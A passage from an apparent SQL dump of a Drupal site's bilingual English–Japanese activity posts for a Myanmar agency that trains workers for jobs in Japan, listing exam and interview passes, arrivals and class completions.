src=\"/sites/default/files/inline-images/0-02-01-aaf6d1694a56063549af1e65fc2adf60c6f354b2c0f98e71862bc49480b9b549_8228be82603b0132.jpg\" data-entity-uuid=\"e5ea1ca6-9e48-45c6-a3fd-51e37a78247e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7f8bf287051628fe542dfe1361779338716dc107a015c5c06be123ded82ffb8_5a47cc0f40065b9f.jpg\" data-entity-uuid=\"a6a2ae23-9364-4049-ae45-17f0b70456fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2f3d74c6468368650282adcc3ef32f3f4a25f7c434c4b174cbcced600a2ea66_65bfb62c6fc87d06.jpg\" data-entity-uuid=\"771f1d6f-7cae-43b0-bda7-9d3215416018\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-fe3e119dfb082a30adcde1ff897ea5df820f2e40d7286e4f0cd3c9cd4405ea57_b51abf4b4648412b.jpg\" data-entity-uuid=\"3fc47b17-3b12-4996-8ff0-5f424cb156a7\" data-entity-type=\"file\">', '', 'basic_html'),
('activities', 0, 122, 544, 'ja', 0, '<blockquote><h2>寿司レストランでの1期生インターンシップ</h2><p>このインターンシップでは、技術的な面だけでなく、食を取り巻く日本の文化や伝統についても学ぶことができました。新鮮な旬の食材の重要性を理解することから、厨房における敬意と規律の重要性を理解することまで、すべてのレッスンは、寿司料理の背後にある豊かな伝統に対する私の賞賛を深めました。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-9f8d22c92e76a81b3af76036f43e0bf8dd32fc0e03738882ea167934d692cf08_8e52a9e48a1897f3.jpg\" data-entity-uuid=\"638fbc43-354c-4a83-8619-86ed53743365\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-40b11a3f4772d17614c9f522ce6f8cc0f64b54dd6e04a045475db49f930a7334_7ec5d1ab150ab3a7.jpg\" data-entity-uuid=\"c2a23cb2-ef07-4577-baab-62bb10050347\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-91f4a6d011d24228e0d94d359bc0917a8ca3b0648f6548629f87053d21707d37_968c66caee131c1f.jpg\" data-entity-uuid=\"11b83da9-69ce-4f72-a7f1-9862d99d75ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-396e60b1b371cc598c56fec5c3be8d0ab272b2dbcb0f6837255d43b28f745afb_3d4c2aeaabd3f8fb.jpg\" data-entity-uuid=\"e3b6955f-da68-4424-892f-1c1ab4ebf4dd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aaf6d1694a56063549af1e65fc2adf60c6f354b2c0f98e71862bc49480b9b549_8228be82603b0132.jpg\" data-entity-uuid=\"e5ea1ca6-9e48-45c6-a3fd-51e37a78247e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7f8bf287051628fe542dfe1361779338716dc107a015c5c06be123ded82ffb8_5a47cc0f40065b9f.jpg\" data-entity-uuid=\"a6a2ae23-9364-4049-ae45-17f0b70456fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2f3d74c6468368650282adcc3ef32f3f4a25f7c434c4b174cbcced600a2ea66_65bfb62c6fc87d06.jpg\" data-entity-uuid=\"771f1d6f-7cae-43b0-bda7-9d3215416018\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-fe3e119dfb082a30adcde1ff897ea5df820f2e40d7286e4f0cd3c9cd4405ea57_b51abf4b4648412b.jpg\" data-entity-uuid=\"3fc47b17-3b12-4996-8ff0-5f424cb156a7\" data-entity-type=\"file\">', '', 'basic_html'),
('activities', 0, 123, 545, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHIN YU MON PHYO &amp; THAE EI PHYU for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"11cc8788-a3e8-44aa-adc5-3fa9788ac0ac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khin%20yu%20mon%20phyo.jpg\"><img data-entity-uuid=\"8483420b-9966-4684-85c2-a7c5dc9eec72\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thae%20ei%20phyu.jpg\">', '', 'full_html'),
('activities', 0, 123, 545, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KHIN YU MON PHYO</strong> さんと <strong>THAE EI PHYU</strong> さんが TOKUTEI GAISHOKU (レストラン) に合格しました。おめでとうございます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/khin%20yu%20mon%20phyo.jpg\" data-entity-uuid=\"11cc8788-a3e8-44aa-adc5-3fa9788ac0ac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ei%20phyu.jpg\" data-entity-uuid=\"8483420b-9966-4684-85c2-a7c5dc9eec72\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 124, 547, 'en', 0, '<blockquote><p>CONGRATULATIONS !&nbsp;</p></blockquote><p>Congratulations for THURA KYAW for passing TOKUTEI GAISHOKU ( restaurant)&nbsp;</p><img data-entity-uuid=\"c14dffcc-f57b-4359-b31d-d7bd20f9884c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thura%20kyaw.jpg\">', '', 'full_html'),
('activities', 0, 124, 547, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>THURA KYAW</strong>、特定外食合格おめでとうございます</p><img src=\"/sites/default/files/inline-images/thura%20kyaw.jpg\" data-entity-uuid=\"c14dffcc-f57b-4359-b31d-d7bd20f9884c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 125, 549, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations MAY THINGYAN HTUN &amp; NAW NAY DAR PAUL for passing the TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"a767e823-1818-45b8-bfa5-8e53174e07f4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20thingyan%20htun.jpg\"><img data-entity-uuid=\"883558f9-196f-43ae-bf00-696ab32d1537\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/naw%20nay%20dar%20palu.jpg\">', '', 'full_html'),
('activities', 0, 125, 549, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>MAY THINGYAN HTUN</strong>さんと<strong>NAW NAY DAR PALU </strong>さんが、TOKUTEI GAISHOKU（レストラン）に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/may%20thingyan%20htun.jpg\" data-entity-uuid=\"a767e823-1818-45b8-bfa5-8e53174e07f4\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/naw%20nay%20dar%20palu.jpg\" data-entity-uuid=\"883558f9-196f-43ae-bf00-696ab32d1537\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 126, 551, 'en', 0, '<blockquote><h2>Arrival At Japan(10-4-2024)</h2></blockquote><p>Eight Kaigo children who departed from Myanmar on a Tokutei Visa on April 9, 2024, will arrive in Japan today, April 10, 2024. May you achieve great success in Japan with your new endeavors.</p><img src=\"/sites/default/files/inline-images/0-02-01-9a9113c0ab47d61d6f44e1ab82e21a9d2e224d79ec9a0c8be6282758671e3242_c767f65b91012f29.jpg\" data-entity-uuid=\"4c6202c4-1968-4a65-9fc8-12dcb75586c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-46ded82e6875be1c575c2c4cf6bd4e5a9ae3a64d36a4dce3bf7fc19f16a4875d_f44ec97cf8b68fba.jpg\" data-entity-uuid=\"2e2e8b8f-d542-4c37-b6c6-8147bb7068dc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7bc7d196b183d6305a85d12a7ffa14f91a9c1f16afd359db093a65d8bf05c9c_1e32546c6fc28083.jpg\" data-entity-uuid=\"f6008a16-5ea7-4f8e-93a7-04cef7dca549\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 126, 551, 'ja', 0, '<blockquote><h2>日本到着(10-4-2024)</h2><p>2024年4月9日にトクテイビザでミャンマーを出発したカイゴの子どもたち8名が、本日2024年4月10日に日本に到着します。日本での新たな活躍が大いに期待されます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-9a9113c0ab47d61d6f44e1ab82e21a9d2e224d79ec9a0c8be6282758671e3242_c767f65b91012f29.jpg\" data-entity-uuid=\"4c6202c4-1968-4a65-9fc8-12dcb75586c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-46ded82e6875be1c575c2c4cf6bd4e5a9ae3a64d36a4dce3bf7fc19f16a4875d_f44ec97cf8b68fba.jpg\" data-entity-uuid=\"2e2e8b8f-d542-4c37-b6c6-8147bb7068dc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e7bc7d196b183d6305a85d12a7ffa14f91a9c1f16afd359db093a65d8bf05c9c_1e32546c6fc28083.jpg\" data-entity-uuid=\"f6008a16-5ea7-4f8e-93a7-04cef7dca549\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 127, 553, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats YU WAI PHYO , SOE SANDAR HTWE, PANN EI ZAW for Tokutei Gaishoku (Restaurant)&nbsp;</p><img data-entity-uuid=\"20ae1406-4043-4478-a49e-742e89470e62\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pann%20ei%20zaw.jpg\"><img data-entity-uuid=\"f3a2deb2-6f5c-4b32-9597-32e99fb4a8be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/soe%20sandar%20htwe.jpg\"><img data-entity-uuid=\"42853554-ebd5-4f1d-a743-230c2a126fc4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20wai%20phyo.jpg\">', '', 'full_html'),
('activities', 0, 127, 553, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congrats <strong>YU WAI PHYO</strong> , <strong>SOE SANDAR HTWE</strong>, <strong>PANN EI ZAW</strong> for Tokutei Gaishoku (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/pann%20ei%20zaw.jpg\" data-entity-uuid=\"20ae1406-4043-4478-a49e-742e89470e62\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/soe%20sandar%20htwe.jpg\" data-entity-uuid=\"f3a2deb2-6f5c-4b32-9597-32e99fb4a8be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20wai%20phyo.jpg\" data-entity-uuid=\"42853554-ebd5-4f1d-a743-230c2a126fc4\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 128, 555, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations for <strong>NAN THAE NU SOE</strong>, <strong>EI EI MIN</strong>, <strong>HLAING MEE MEE HTIKE</strong>, <strong>PYAE SU SU SAN&nbsp;</strong></p><img data-entity-uuid=\"05a66305-08bd-45a3-abf5-dff8b6907f3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20EI%20MIN.jpg\"><img data-entity-uuid=\"0590a05b-3319-4571-b668-8bde1c1ec54f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HLAING%20MEE%20MEE%20HTIKE.jpg\"><img data-entity-uuid=\"15e619d7-4901-458e-ac12-ff3043e2f39b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20THAE%20NU%20SOE.jpg\"><img data-entity-uuid=\"0802a1f5-f0d5-4eb5-9323-2cc42922b62b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PYAE%20SU%20SU%20SAN.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 128, 555, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations for <strong>NAN THAE NU SOE</strong>, <strong>EI EI MIN</strong>, <strong>HLAING MEE MEE HTIKE</strong>, <strong>PYAE SU SU SAN&nbsp;</strong></p><img src=\"/sites/default/files/inline-images/EI%20EI%20MIN.jpg\" data-entity-uuid=\"05a66305-08bd-45a3-abf5-dff8b6907f3a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HLAING%20MEE%20MEE%20HTIKE.jpg\" data-entity-uuid=\"0590a05b-3319-4571-b668-8bde1c1ec54f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NAN%20THAE%20NU%20SOE.jpg\" data-entity-uuid=\"15e619d7-4901-458e-ac12-ff3043e2f39b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PYAE%20SU%20SU%20SAN.jpg\" data-entity-uuid=\"0802a1f5-f0d5-4eb5-9323-2cc42922b62b\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 129, 557, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations KAY THARI TOE, MAY HLA MYO, NILA AUNG.&nbsp;</p><img data-entity-uuid=\"0e2594d9-768b-4dfa-9ba0-ba3e06ebbe85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAY%20THARI%20TOE.jpg\"><img data-entity-uuid=\"578fa207-50dd-4808-8913-e69f51d16e7c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MAY%20HLA%20MYO.jpg\"><img data-entity-uuid=\"f4047036-cd6d-4501-87db-a965dd12fda4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NILA%20AUNG.jpg\">', '', 'full_html'),
('activities', 0, 129, 557, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations KAY THARI TOE, MAY HLA MYO, NILA AUNG.&nbsp;</p><img src=\"/sites/default/files/inline-images/KAY%20THARI%20TOE.jpg\" data-entity-uuid=\"0e2594d9-768b-4dfa-9ba0-ba3e06ebbe85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MAY%20HLA%20MYO.jpg\" data-entity-uuid=\"578fa207-50dd-4808-8913-e69f51d16e7c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NILA%20AUNG.jpg\" data-entity-uuid=\"f4047036-cd6d-4501-87db-a965dd12fda4\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 130, 559, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>THANT ZIN WIN</li><li>HTET LIN AUNG</li><li>EI KAY ZIN</li><li>MOE SET NAING</li><li>PAING THU SAN</li><li>HPONE MYAT NAING</li></ul><img data-entity-uuid=\"9751b169-606f-4a3f-b8d7-473f6d711931\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KAY%20ZIN.jpg\"><img data-entity-uuid=\"bba51a53-315f-4ea0-b285-2b1c466ce229\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HPONE%20MYAT%20NAING.jpg\"><img data-entity-uuid=\"8752ce74-bee3-4e57-8101-78e533f321ba\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20LIN%20AUNG.jpg\"><img data-entity-uuid=\"b174b808-6bc9-41f8-8f37-0d621fe3b964\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MOE%20SET%20NAING.jpg\"><img data-entity-uuid=\"7e2b0631-68f5-4ea9-947a-e18e5f47ed4a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20THU%20SAN.jpg\"><img data-entity-uuid=\"3e16c2f1-e005-461f-bd05-0ec06e6efc03\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THANT%20ZIN%20WIN.jpg\">', '', 'full_html'),
('activities', 0, 130, 559, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>THANT ZIN WIN</li><li>HTET LIN AUNG</li><li>EI KAY ZIN</li><li>MOE SET NAING</li><li>PAING THU SAN</li><li>HPONE MYAT NAING</li></ul><img src=\"/sites/default/files/inline-images/EI%20KAY%20ZIN.jpg\" data-entity-uuid=\"9751b169-606f-4a3f-b8d7-473f6d711931\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HPONE%20MYAT%20NAING.jpg\" data-entity-uuid=\"bba51a53-315f-4ea0-b285-2b1c466ce229\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HTET%20LIN%20AUNG.jpg\" data-entity-uuid=\"8752ce74-bee3-4e57-8101-78e533f321ba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MOE%20SET%20NAING.jpg\" data-entity-uuid=\"b174b808-6bc9-41f8-8f37-0d621fe3b964\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PAING%20THU%20SAN.jpg\" data-entity-uuid=\"7e2b0631-68f5-4ea9-947a-e18e5f47ed4a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THANT%20ZIN%20WIN.jpg\" data-entity-uuid=\"3e16c2f1-e005-461f-bd05-0ec06e6efc03\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 131, 561, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations to KYAW ZIN LATT for passing Interview for TOKUTEI GAISHOKU (restaurant)&nbsp;</p><img data-entity-uuid=\"ee025a8b-04dc-411c-95f6-252d8c41e35e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KYAW%20ZIN%20LATT.jpg\">', '', 'full_html'),
('activities', 0, 131, 561, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KYAW ZIN LATT</strong>さんがTOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/KYAW%20ZIN%20LATT.jpg\" data-entity-uuid=\"ee025a8b-04dc-411c-95f6-252d8c41e35e\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 132, 563, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YIN MAY THU &amp; YAMIN SHWE ZIN for passsing the Job Interview for JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/YAMIN%20SHWE%20ZIN.jpg\" data-entity-uuid=\"34f45fc2-1fa2-43a6-973d-a99dc56e1944\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YIN%20MAY%20THU.jpg\" data-entity-uuid=\"345a9c35-248a-4618-82e0-09ba81c35f89\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 132, 563, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YIN MAY THU さん</strong>と <strong>YAMIN SHWE ZIN さん</strong>が日本の就職面接に合格しました、おめでとうございます!</p><img src=\"/sites/default/files/inline-images/YAMIN%20SHWE%20ZIN.jpg\" data-entity-uuid=\"34f45fc2-1fa2-43a6-973d-a99dc56e1944\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YIN%20MAY%20THU.jpg\" data-entity-uuid=\"345a9c35-248a-4618-82e0-09ba81c35f89\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 133, 565, 'en', 0, '<blockquote><h2>2nd Batch Pratical Class Completion</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-3\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"9e867f11-c94f-4318-a6c5-69e1c59ec6b1\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>In the Gaishoku practical class, the Japanese native instructor has meticulously instructed on the appropriate vocabulary, etiquette, and protocols for dining in Japanese restaurants.The inaugural Gaishoku First Batch classes, led by instructors with over 30 years of experience in Japan, have concluded successfully today, covering topics ranging from vegetable and meat nomenclature to kitchen operations.We extend our sincere gratitude on behalf of New Comet to the dedicated teachers who impart knowledge in such a structured manner to our students.With our successful training and preparation of interview-passing students, New Comet encourages applications for job opportunities without delay.</p><img src=\"/sites/default/files/inline-images/0-02-01-0c1c787e25a0038a004c8fb1f1f3fef5a1206b844d7b9547f7abeb925d0273aa_8177a77005454691.jpg\" data-entity-uuid=\"8b96569d-54ab-42eb-8511-29e44bc7d66f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1d2afaf1819b313743c675427b7a9036b89100980bf89a95b21232137cba4f6c_d617be5df38857d4.jpg\" data-entity-uuid=\"838d79df-114c-4c64-95cf-79c5ed8a7a04\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-6d78d6e7e6e3c013ffff587c73022012428516c84e4708ef4eddab92785a1b25_e4fa61dc1f0a7eaa.jpg\" data-entity-uuid=\"b80d1b92-a725-44c1-a64d-8dd8415dcbe9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7aea772f8533f509651ad0ce89b0eb5d270b4758f6edd7566f71575c1c12d764_37459e5c5941b0a5.jpg\" data-entity-uuid=\"1d2edae8-34c8-4310-8118-f9551afe3a96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e53bae7c248717b51723e13b61b802d8df17dd4c1c7da8f3b04ec00c5d72ef1_228aff5a82ac6a25.jpg\" data-entity-uuid=\"b68bc03d-52d2-44da-8975-eb3adce1de40\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-2302c783d003bda12faf3fdd393353a03cc6136ae6bb3f9cdfdb068d7b2fac25_7c99ac1472131a12.jpg\" data-entity-uuid=\"defb62ed-14d1-492c-ac75-b58d1404c12d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d5dac7dda6d581cbc470feebbbd468d980c627d2a061f3651e8f19667e488377_60d78d918658494d.jpg\" data-entity-uuid=\"427ad047-f490-47dc-a8fb-c672cbaf09e0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de13510039a9d12d12a13345862bc0c6374a231d8abb6e9d7d62857e50efedab_b7d7f45f1ac532ed.jpg\" data-entity-uuid=\"85aa4ffd-37d9-46d2-8e35-3ae912d0e4b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e3da82c6466cf309c553b6356c24dc7637df56327162829a054e8a1e76707da0_cbef71a7e5f47f26.jpg\" data-entity-uuid=\"25dc1e52-8259-40f7-8161-a809b26f9261\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"text-sm rounded-xl p-4 text-token-text-secondary flex items-center gap-3 fruit:rounded-2xl border border-token-border-light bg-token-main-surface-primary\">&nbsp;</div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 133, 565, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-3\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"9e867f11-c94f-4318-a6c5-69e1c59ec6b1\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>第 2 バッチ実習クラス終了</h2></blockquote><p>外食実習クラスでは、日本人のネイティブ講師が、日本のレストランで食事をする際の適切な語彙、エチケット、手順を丁寧に指導しました。日本で 30 年以上の経験を持つ講師が指導する、野菜や肉の命名法から厨房業務まで幅広いトピックを扱った外食第 1 バッチの初回クラスが本日無事終了しました。体系的に知識を学生に伝えてくださる熱心な講師の方々に、ニューコメットを代表して心から感謝申し上げます。面接に合格した学生のトレーニングと準備が成功したニューコメットは、遅滞なく就職の応募を奨励しています。</p><img src=\"/sites/default/files/inline-images/0-02-01-0c1c787e25a0038a004c8fb1f1f3fef5a1206b844d7b9547f7abeb925d0273aa_8177a77005454691.jpg\" data-entity-uuid=\"8b96569d-54ab-42eb-8511-29e44bc7d66f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1d2afaf1819b313743c675427b7a9036b89100980bf89a95b21232137cba4f6c_d617be5df38857d4.jpg\" data-entity-uuid=\"838d79df-114c-4c64-95cf-79c5ed8a7a04\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-6d78d6e7e6e3c013ffff587c73022012428516c84e4708ef4eddab92785a1b25_e4fa61dc1f0a7eaa.jpg\" data-entity-uuid=\"b80d1b92-a725-44c1-a64d-8dd8415dcbe9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7aea772f8533f509651ad0ce89b0eb5d270b4758f6edd7566f71575c1c12d764_37459e5c5941b0a5.jpg\" data-entity-uuid=\"1d2edae8-34c8-4310-8118-f9551afe3a96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e53bae7c248717b51723e13b61b802d8df17dd4c1c7da8f3b04ec00c5d72ef1_228aff5a82ac6a25.jpg\" data-entity-uuid=\"b68bc03d-52d2-44da-8975-eb3adce1de40\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-2302c783d003bda12faf3fdd393353a03cc6136ae6bb3f9cdfdb068d7b2fac25_7c99ac1472131a12.jpg\" 